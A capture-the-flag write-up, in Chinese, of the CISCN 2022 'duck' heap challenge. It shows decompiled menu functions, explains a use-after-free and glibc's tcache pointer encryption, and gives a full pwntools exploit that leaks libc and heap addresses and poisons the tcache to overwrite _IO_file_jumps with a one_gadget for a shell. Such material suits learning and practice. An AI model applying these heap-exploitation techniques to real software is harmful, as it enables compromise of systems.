[CISCN 2022 華東北] duck
UAF
|leak_libc
|leak_heap_base
|指標加密
|unsortedbin
|one_gadget
[*] '/home/bamuwe/duck/pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
$ checksec ./pwn
/home/ubuntu/glibc/glibc-2.34/build/lib/gconv
/home/ubuntu/glibc/glibc-2.34/build/lib/locale
/home/ubuntu/glibc/glibc-2.34/build/lib/locale/locale-archive
/home/ubuntu/glibc/glibc-2.34/build/share/locale
...
$ strings /home/bamuwe/duck/libc.so.6 |grep glibc
1.Add
2.Del
3.Show
4.Edit
Choice:
$ ./pwn
int del()
{
int v1; // [rsp+Ch] [rbp-4h]
puts("Idx: ");
v1 = numinput();
if ( v1 <= 20 && qword_4060[v1] )
{
free(qword_4060[v1]);
return puts("Done");
}
else
{
puts("Not allow");
return v1;
}
}
del()漏洞函式
沒有清除指標,存在uaf
int edit()
{
int v1; // [rsp+8h] [rbp-8h]
unsigned int v2; // [rsp+Ch] [rbp-4h]
puts("Idx: ");
v1 = numinput();
if ( v1 <= 20 && qword_4060[v1] )
{
puts("Size: ");
v2 = numinput();
if ( v2 > 0x100 )
{
return puts("Error");
}
else
{
puts("Content: ");
sub_12AC(qword_4060[v1], v2);
puts("Done");
return 0;
}
}
else
{
puts("Not allow");
return v1;
}
}
edit()
int sub_13F3()
{
int v1; // [rsp+Ch] [rbp-4h]
puts("Idx: ");
v1 = numinput();
if ( v1 <= 20 && qword_4060[v1] )
{
puts(qword_4060[v1]);
return puts("Done");
}
else
{
puts("Not allow");
return v1;
}
}
show()
int add()
{
int i; // [rsp+4h] [rbp-Ch]
void *v2; // [rsp+8h] [rbp-8h]
v2 = malloc(0x100uLL);
for ( i = 0; i <= 19; ++i )
{
if ( !qword_4060[i] )
{
qword_4060[i] = v2;
puts("Done");
return 1;
}
}
return puts("Empty!");
}
add()
def add():
io.sendlineafter(b'Choice: ',b'1')
def free(idx):
io.sendlineafter(b'Choice: ',b'2')
io.sendlineafter(b'Idx: \n',str(int(idx)))
def show(idx):
io.sendlineafter(b'Choice: ',b'3')
io.sendlineafter(b'Idx: \n',str(int(idx)))
def edit(idx,content):
io.sendlineafter(b'Choice: ',b'4')
io.sendlineafter(b'Idx: \n',str(int(idx)))
io.sendlineafter(b'Size: \n',str(int(0x100)))
io.send(content)
程式邏輯:
-
add()
會分配一個0x110
空間的堆塊pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x55555555b000 Size: 0x291 Allocated chunk | PREV_INUSE Addr: 0x55555555b290 Size: 0x111 Allocated chunk | PREV_INUSE Addr: 0x55555555b3a0 Size: 0x111 Allocated chunk | PREV_INUSE Addr: 0x55555555b4b0 Size: 0x111 Top chunk | PREV_INUSE Addr: 0x55555555b5c0 Size: 0x20a41
-
edit()
能夠對堆上資料進行修改1.Add 2.Del 3.Show 4.Edit Choice: 1 Done 1.Add 2.Del 3.Show 4.Edit Choice: 1 Done 1.Add 2.Del 3.Show 4.Edit Choice: 4 Idx: 0 Size: 10 Content: AAAA Done 1.Add 2.Del 3.Show 4.Edit Choice:
0x55555555b290 0x0000000000000000 0x0000000000000111 ................ 0x55555555b2a0 0x0000000a41414141 0x0000000000000000 AAAA............ 0x55555555b2b0 0x0000000000000000 0x0000000000000000 ................ 0x55555555b2c0 0x0000000000000000 0x0000000000000000 ................ 0x55555555b2d0 0x0000000000000000 0x0000000000000000 ................ 0x55555555b2e0 0x0000000000000000 0x0000000000000000 ................ 0x55555555b2f0 0x0000000000000000 0x0000000000000000 ................
利用思路:
-
先用
unsorted_bin
洩露libc
和heap_base
for i in range(9): add() #0-7 for i in range(9): free(i) #0-7 #leak_libc show(7) main_arena_addr = u64(io.recv(6).ljust(8,b'\x00'))-96 libc_offset = main_arena_addr-lib.sym['main_arena'] one_addr = 0xda864+libc_offset #one_gadget IO_file_jumps = libc_offset + lib.sym['_IO_file_jumps'] success(f'main_arena_addr=>{hex(main_arena_addr)}') success(f'one_addr=>{hex(one_addr)}') success(f'IO_file_jumps=>{hex(IO_file_jumps)}') #leak_heap_base show(0) heap_base_addr = u64(io.recv(5).ljust(8,b'\x00')) success(f'heap_base_addr=>{hex(heap_base_addr)}')
獲得了libc,heap_base,one_gadget
-
利用
tcache_bin
偽造fake_chunk
獲得shell
for i in range(5): add() #8-13 edit(1,p64(heap_base_addr^IO_file_jumps)) #對chunk0修改 `指標加密` add() #14 add() #15 edit(15,p64(0)*3+p64(one_addr))
先控制
tcache_bin
中剩餘兩個節點,方便我們操作成功修改為
IO_file_jumps
地址,這裡因為指標加密機制的存在,所以p64(heap_base_addr^IO_file_jumps)
關於指標加密:
在glibc2.32
之後引入了一個新的指標機制:
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");
tcache->entries[tc_idx] = REVEAL_PTR (e->next);
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}
malloc
引入了一個異或加密,現在要尋找一個地址,需要使用真實地址與heap_base
地址進行異或,得到指標,給利用帶來了難度,但同時也帶來了新的洩露姿勢
https://www.anquanke.com/post/id/236186
exp:
#Ubuntu2.34
from pwn import *
context.log_level = 'debug'
io = gdb.debug('./pwn')
# io = remote('node4.anna.nssctf.cn',28254)
elf = ELF('./pwn')
lib = ELF('/home/bamuwe/duck/libc.so.6')
def add():
io.sendlineafter(b'Choice: ',b'1')
def free(idx):
io.sendlineafter(b'Choice: ',b'2')
io.sendlineafter(b'Idx: \n',str(int(idx)))
def show(idx):
io.sendlineafter(b'Choice: ',b'3')
io.sendlineafter(b'Idx: \n',str(int(idx)))
def edit(idx,content):
io.sendlineafter(b'Choice: ',b'4')
io.sendlineafter(b'Idx: \n',str(int(idx)))
io.sendlineafter(b'Size: \n',str(int(0x100)))
io.send(content)
for i in range(9):
add() #0-7
for i in range(9):
free(i) #0-7
#leak_libc
show(7)
main_arena_addr = u64(io.recv(6).ljust(8,b'\x00'))-96
libc_offset = main_arena_addr-lib.sym['main_arena']
one_addr = 0xda864+libc_offset #one_gadget
IO_file_jumps = libc_offset + lib.sym['_IO_file_jumps']
success(f'main_arena_addr=>{hex(main_arena_addr)}')
success(f'one_addr=>{hex(one_addr)}')
success(f'IO_file_jumps=>{hex(IO_file_jumps)}')
#leak_heap_base
show(0)
heap_base_addr = u64(io.recv(5).ljust(8,b'\x00'))
success(f'heap_base_addr=>{hex(heap_base_addr)}')
for i in range(5):
add() #8-13
edit(1,p64(heap_base_addr^IO_file_jumps)) #對chunk0修改
add() #14
add() #15
edit(15,p64(0)*3+p64(one_addr))
io.interactive()